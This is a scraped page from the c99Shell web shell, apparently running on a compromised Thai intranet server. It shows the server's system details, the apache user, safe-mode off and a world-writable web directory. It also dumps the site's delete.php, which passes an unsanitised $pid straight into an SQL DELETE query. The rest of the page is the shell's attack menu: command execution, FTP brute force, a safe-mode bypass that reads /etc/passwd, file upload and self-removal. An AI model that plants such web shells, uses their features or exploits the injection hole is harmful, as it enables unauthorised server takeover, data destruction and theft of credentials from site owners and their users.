!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/intranet/   drwxrwxrwx
Free 52.62 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     delete.php (535 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/intranet/delete.php
Size 535 B
MD5 a316f752c42e908efaeaf8fc132b76af
Owner/Group root/root
Perms-rw-r--r--
Create time 06/07/2011 01:41:54
Access time 11/07/2024 13:24:55
MODIFY time 26/01/2007 13:11:52

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
3C 3F 0D 0A 73 65 73 73 69 6F 6E 5F 73 74 61 72 74 28 29 3B 0D 0A 69 6E
63 6C 75 64 65 5F 6F 6E 63 65 28 27 63 6F 6E 66 69 67 2E 70 68 70 27 29
3B 20 20 20 20 20 20 0D 0A 63 68 6B 4C 6F 67 69 6E 28 29 3B 0D 0A 67 65
74 46 75 6C 6C 4E 61 6D 65 28 24 5F 53 45 53 53 49 4F 4E 5B 75 69 64 5D
2C 20 24 5F 53 45 53 53 49 4F 4E 5B 67 69 64 5D 29 3B 0D 0A 3F 3E 0D 0A
3C 68 74 6D 6C 3E 0D 0A 3C 68 65 61 64 3E 0D 0A 3C 6D 65 74 61 20 68 74
74 70 2D 65 71 75 69 76 3D 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20
63 6F 6E 74 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D 6C 3B 20 63 68 61 72
73 65 74 3D 77 69 6E 64 6F 77 73 2D 38 37 34 22 3E 0D 0A 3C 6C 69 6E 6B
20 68 72 65 66 3D 22 73 74 79 6C 65 2E 63 73 73 22 20 72 65 6C 3D 22 73
74 79 6C 65 73 68 65 65 74 22 20 74 79 70 65 3D 22 74 65 78 74 2F 63 73
73 22 3E 0D 0A 3C 74 69 74 6C 65 3E 2D 3D 3D 20 3A 20 C2 D4 B9 B4 D5 B5
E9 CD B9 C3 D1 BA C3 D0 BA BA 20 49 6E 74 72 61 6E 65 74 20 42 43 4E 55
20 3A 20 3D 3D 2D 3C 2F 74 69 74 6C 65 3E 0D 0A 0D 0A 3C 2F 68 65 61 64
3E 0D 0A 0D 0A 3C 62 6F 64 79 20 6C 65 66 74 6D 61 72 67 69 6E 3D 22 30
22 20 72 69 67 68 74 6D 61 72 67 69 6E 3D 22 30 22 20 74 6F 70 6D 61 72
67 69 6E 3D 22 30 22 20 62 6F 74 74 6F 6D 6D 61 72 67 69 6E 3D 22 30 22
3E 0D 0A 0D 0A 3C 3F 70 68 70 0D 0A 63 6F 6E 6E 44 42 28 29 3B 0D 0A 6D
79 73 71 6C 5F 71 75 65 72 79 28 22 64 65 6C 65 74 65 20 66 72 6F 6D 20
70 65 72 73 6F 6E 20 77 68 65 72 65 20 70 69 64 3D 24 70 69 64 22 29 3B
0D 0A 65 63 68 6F 20 22 49 6E 66 6F 72 6D 61 74 69 6F 6E 20 44 65 6C 65
74 65 64 22 3B 0D 0A 3F 3E 0D 0A 0D 0A 3C 2F 62 6F 64 79 3E 0D 0A 3C 2F
68 74 6D 6C 3E 0D 0A
<?  session_start();  in
clude_once('config.php')
;        chkLogin();  ge
tFullName($_SESSION[uid]
, $_SESSION[gid]);  ?>  
<html>  <head>  <meta ht
tp-equiv="Content-Type" 
content="text/html; char
set=windows-874">  <link
 href="style.css" rel="s
tylesheet" type="text/cs
s">  <title>-== : ยินดีต
้อนรับระบบ Intranet BCNU
 : ==-</title>    </head
>    <body leftmargin="0
" rightmargin="0" topmar
gin="0" bottommargin="0"
>    <?php  connDB();  m
ysql_query("delete from 
person where pid=$pid");
  echo "Information Dele
ted";  ?>    </body>  </
html>  

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0079 ]--